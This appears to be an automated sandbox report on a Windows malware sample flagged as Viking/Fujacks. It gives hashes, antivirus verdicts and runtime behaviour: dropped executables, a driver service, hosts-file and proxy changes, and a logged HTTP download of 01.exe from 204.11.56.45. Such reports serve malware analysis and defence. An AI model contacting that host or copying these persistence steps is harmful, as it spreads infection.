Analysis Date: 2015-01-27 01:54:04
MD5: 37e89c260b3deebc30970b42bfa47c9e
SHA1: 1f91b41c33c503a3ebefdb75da00bc9da91e4d74

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 03572dc8bff93c66b265a638b843b48f sha1: 2831ff5d3567dac2585e864a6ac6e75e49c3d59f size: 77824
Section .rdata: md5: 99282cb2e19a879647fed1e10073c920 sha1: 63e4042c66e0e4097457a9f75495e2c61b416474 size: 8192
Section .data: md5: b6f6064ca7f042e428ea420262837bf2 sha1: 5d7a7d29c8f334b249ffe90accc5a99b9f4fdb24 size: 8192
Section .rsrc: md5: f29fc92e0c9161fc04c57fb665b7abb3 sha1: db64e1b87f3eefa1f70b7682f860d921be1c5481 size: 89600
Section .tc$: md5: b66895d29926164b0057a3dd48630b40 sha1: 2836c3c1de68c0c15897e04e8002b6c832cbe2f1 size: 28672
Timestamp: 2000-05-07 03:47:59
Version info:
LegalCopyright: Copyright c 2000
InternalName: mmvem
FileVersion: 1, 0, 0, 1
CompanyName: mmedia
PrivateBuild:
LegalTrademarks:
Comments:
ProductName: mmedia mmvem
SpecialBuild:
ProductVersion: 1, 0, 0, 1
FileDescription: mmvem
OriginalFilename: mmvem.exe
PEhash: ca68ec860d0ae3325d7910187ef5abca4708fb80
IMPhash: c873d79e4f0aec16ef153fe631f20302
AV 360 Safe: Virus.Win32.Agent.O
AV Ad-Aware: Win32.Viking.AR
AV Alwil (avast): Crypt-RPT [Trj]
AV Arcabit (arcavir): Win32.Viking.AR
AV Authentium: W32/Viking.A.gen!Eldorado
AV Avira (antivir): W32/Fujacks.DR
AV BullGuard: Win32.Viking.AR
AV CA (E-Trust Ino): Win32/Viking.D
AV CAT (quickheal): W32.Agent.DP
AV ClamAV: Worm.VB-35
AV Dr. Web: Win32.HLLW.Autoruner.8224
AV Emsisoft: Win32.Viking.AR
AV Eset (nod32): Win32/Agent.DP virus
AV Fortinet: W32/Fujacks.BF!tr
AV Frisk (f-prot): W32/Viking.A.gen!Eldorado
AV F-Secure: Win32.Viking.AR
AV Grisoft (avg): Win32/Fujacks.S
AV Ikarus: Trojan-Downloader.Win32.Jadtre
AV K7: Virus ( 00108a531 )
AV Kaspersky: Virus.Win32.Agent.dp
AV MalwareBytes: no_virus
AV Mcafee: W32/Fujacks.ay
AV Microsoft Security Essentials: Virus:Win32/Viking.NK
AV MicroWorld (escan): Win32.Viking.AR
AV Rising: Win32.Agent.hn
AV Sophos: W32/FuzVir-A
AV Symantec: W32.Loorp.A!inf
AV Trend Micro: PE_JEEFO.D
AV VirusBlokAda (vba32): Virus.Win32.Koklek

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\294d_appcompat.txt
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Process: C:\WINDOWS\system32\drwtsn32 -p 1332 -e 172 -g
Creates Process: C:\WINDOWS\system32\dwwin.exe -x -s 216

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates File: C:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates File: PIPE\SfcApi
Creates File: PIPE\wkssvc
Creates File: C:\WINDOWS\system32\qmgr.dll
Creates File: C:\WINDOWS\system32\mspmsnsv.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts Service: WmdmPmSN

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 216

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 1332 -e 172 -g

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 800

Process
↳ Pid 848

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\WINDOWS\system32\drivers\etc\hosts
Creates File: NtHid
Creates File: C:\temp\files\Expor.exe
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\0LM74DA3\desktop.ini
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\0L2RGPMF\desktop.ini
Creates File: C:\temp\files\monitor.exe
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\2905UBK7\desktop.ini
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\TEMP\NtHid.sys
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\YDIURPLT\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\WINDOWS\TEMP\NtHid.sys
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutex: c:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!networkservice!cookies!
Creates Mutex: c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates Service: NtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS: 204.11.56.45
Winsock DNS: www.490a-B8B5-9B8C1E870B0C.com
Winsock DNS: www.baidu.com
Winsock DNS: pc1.114central.com

Process
↳ Pid 1204

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Process
↳ Pid 1860

Process
↳ Pid 1136

Network Details:

DNS: www.a.shifen.com (Type: A) ➝ 180.76.3.151
DNS: pc1.114central.com (Type: A) ➝ 204.11.56.45
DNS: nbtj.114anhui.com (Type: A)
DNS: www.baidu.com (Type: A)
DNS: www.490a-B8B5-9B8C1E870B0C.com (Type: A)
HTTP GET: http://204.11.56.45/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1033 ➝ 204.11.56.45:80

Raw Pcap

Strings